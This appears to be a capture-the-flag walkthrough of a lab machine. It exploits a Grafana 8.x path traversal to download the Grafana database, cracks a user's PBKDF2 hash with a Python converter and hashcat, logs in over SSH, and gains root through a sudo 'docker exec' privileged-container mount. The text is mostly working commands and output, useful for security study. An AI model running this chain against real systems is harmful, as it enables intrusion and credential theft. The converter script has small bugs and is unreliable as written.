Enumeration

Nmap

nmap -sV -sC -p- -T4 --min-rate=1000 10.129.234.47

Starting Nmap 7.93 ( <https://nmap.org> ) at 2025-11-14 12:46 GMT
Stats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 12:49 (0:00:58 remaining)
Nmap scan report for ip-10-129-234-47.eu-west-2.compute.internal (10.129.234.47)
Host is up (0.030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 63470a81ad0f7807464b15524a4d1e39 (RSA)
|   256 7da9acfa01e8dd09904048ecddf308be (ECDSA)
|_  256 91332d1a81871a84d3b90b23233d194b (ED25519)
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 14 Nov 2025 12:47:13 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 14 Nov 2025 12:47:18 GMT
|_    Content-Length: 0

• nmap shows SSH and Grafana running on ports 22 and 3000
• Navigating to port 3000, we see Grafana welcome login page
  • Version number is disclosed in the footer of the page

![[Pasted image 20251115124643.png]]

• The Grafana version 8.X is vulnerable to path traversal: https://hackerone.com/reports/1427086
• To validate this we can attempt the payload fro mthe hackerone report but instead grab /etc/hostname for easier output

curl <http://10.129.234.47:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhostname>

e6ff5b1cbc85

• At this stage, with a known file read on the target, we can try to locate and download the Grafana database as found here: https://www.vulncheck.com/blog/grafana-cve-2021-43798

curl -o grafana.db <http://10.129.234.47:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db>
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    29  100    29    0     0    270      0 --:--:-- --:--:-- --:--:--   273

ls
grafana.db

• Using sqlitebrowser we can read the contents of the db and extract credentials and other sensitive data ![[Pasted image 20251115124711.png]]

• two credentials are stored

  • *boris:dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe4* *9353e35f53b51da8:LCBhdtJWjl:mYl941ma8w*
  • Using the previous link, we establish that the hash format is PBKDF2-HMAC-SHA256
  • We can create a small Python3 script to convert the hash into a crackable format, let’s name it convert.py

#! /usr/bin/env python3
import base64
import binascii

# Define password hash
PASSWORD_HEX = "dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8"

# Define the salt
SALT_STR = "*LCBhdtJWjl"

# Standard iterations for formatting
ITERATIONS = 10000

# Decode the hex hash
try:
    target_raw = binascii.unhexlify(PASSWORD_HEX)
except:
    print("ERROR: PASSWORD_HEX is not valid hex:", e)
    sys.exit(1)

# Base64 encode the salt
target_hash64 = base64.b64encode(target_raw).decode("utf-8")

# Base64 encode the salt
salt64 = base64.b64encode(SALT_STR.encode("utf-8")).decode("utf-8")

# Finally, print the formatted hash to plug into hashcat
print(f"sha256:{ITERATIONS}:{salt64}:{target_hash64}")

sudo nano convert.py
chmod +x convert.py
python3 convert.py > hash.txt
cat hash.txt
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=*

• After that, we have a valid hash so we can proceed to crack with hashcat
• Find the right hashcat -m … we search for PBKDF2

hashcat -h | grep PBKDF2
  11900 | PBKDF2-HMAC-MD5                                            | Generic KDF
  12000 | PBKDF2-HMAC-SHA1                                           | Generic KDF
  10900 | PBKDF2-HMAC-SHA256                                         | Generic KDF

hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: pthread--0x000, 2941/5947 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=:beautiful1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0...O1Hag=
Time.Started.....: Fri Nov 14 13:27:45 2025 (1 sec)
Time.Estimated...: Fri Nov 14 13:27:46 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1802 H/s (9.70ms) @ Accel:32 Loops:1024 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1280/14344384 (0.01%)
Rejected.........: 0/1280 (0.00%)
Restore.Point....: 1024/14344384 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:9216-9999
Candidate.Engine.: Device Generator
Candidates.#1....: kucing -> poohbear1

Started: Fri Nov 14 13:27:25 2025
Stopped: Fri Nov 14 13:27:48 2025

• Password found: beautiful1
• now we can ssh with the boris user

 ssh boris@10.129.234.47

The authenticity of host '10.129.234.47 (10.129.234.47)' can't be established.
ED25519 key fingerprint is SHA256:kKsFY4lOfr5Romb/aAy0GtkTZTFbOGC5rZwkh4dGx+s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.234.47' (ED25519) to the list of known hosts.
boris@10.129.234.47's password:
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 5.4.0-1103-aws x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/pro>

  System information as of Fri Nov 14 13:31:50 UTC 2025

  System load:  1.74              Processes:              207
  Usage of /:   38.0% of 4.78GB   Users logged in:        0
  Memory usage: 14%               IP address for eth0:    10.129.234.47
  Swap usage:   0%                IP address for docker0: 172.17.0.1

Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

122 additional security updates can be applied with ESM Infra.
Learn more about enabling ESM Infra service for Ubuntu 18.04 at
<https://ubuntu.com/18-04>

Last login: Wed Jun  4 13:37:31 2025 from 10.10.14.62
boris@data:~$ls
user.txt
boris@data:~$ cat user.txt
09e30d9842af2a0603cbeb9be35cf2a4
boris@data:~$

Privilege Escalation

boris@data:~$ sudo -l

Matching Defaults entries for boris on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User boris may run the following commands on localhost:
    (root) NOPASSWD: /snap/bin/docker exec *

• With this knowledge and the previous knowledge we gained by enumerating the running container's /etc/hostname file, we can attempt to mount the host's filesystem into the running container by passing the privileged flag to the running container and then mounting the host filesystem.
• Once in the container, we check where the host filesystem is located ( /dev/sda1 ) and mount the filesystem to /mnt

sudo docker exec -u root --privileged -it e6ff5b1cbc85 bash
bash-5.1# mount

overlay on / type overlay (rw,relatime,lowerdir=/var/snap/docker/common/var-lib-docker/overlay2/l/2RMRALAZ4X3ETWWAFIO4URLCKU:/var/snap/docker/common/var-lib-docker/overlay2/l/C32RR2IYKIVOXMXZVRUH2EG
VMU:/var/snap/docker/common/var-lib-docker/overlay2/l/CAVZGWG6DT37UBOHM6XHIUZUD5:/var/snap/docker/common/var-lib-docker/overlay2/l/3ATFAZLXUKTZ62T23IWWGNRXD2:/var/snap/docker/common/var-lib-docker/o
verlay2/l/42TJD6WDSINN56AZRW55R3ICO6:/var/snap/docker/common/var-lib-docker/overlay2/l/UTHFBRCC4KFYKXNBPIO52AZ7OQ:/var/snap/docker/common/var-lib-docker/overlay2/l/ZJJZSZR34MKC5KWMDRYIC4Q62C:/var/sn
ap/docker/common/var-lib-docker/overlay2/l/EAWF5T66G6Z67H3LBO75E3NZCC:/var/snap/docker/common/var-lib-docker/overlay2/l/LMHE5BSBLFJITZ67RL5JIEM4SC,upperdir=/var/snap/docker/common/var-lib-docker/ove
rlay2/90a0267386b75303aabacd2f202af4682d69d52a6d2e7e85ee93c3401e0938e3/diff,workdir=/var/snap/docker/common/var-lib-docker/overlay2/90a0267386b75303aabacd2f202af4682d69d52a6d2e7e85ee93c3401e0938e3/w
ork,xino=off)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime)
/dev/sda1 on /etc/hostname type ext4 (rw,relatime)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime)

bash-5.1# mount /dev/sda1 /mnt
bash-5.1# ls -la /mnt/root/root.txt
-rw-r-----    1 root     root            33 Nov 14 12:44 /mnt/root/root.txt
bash-5.1# cat /mnt/root/root.txt
17765425b664ff743fb017ff24363329

🥂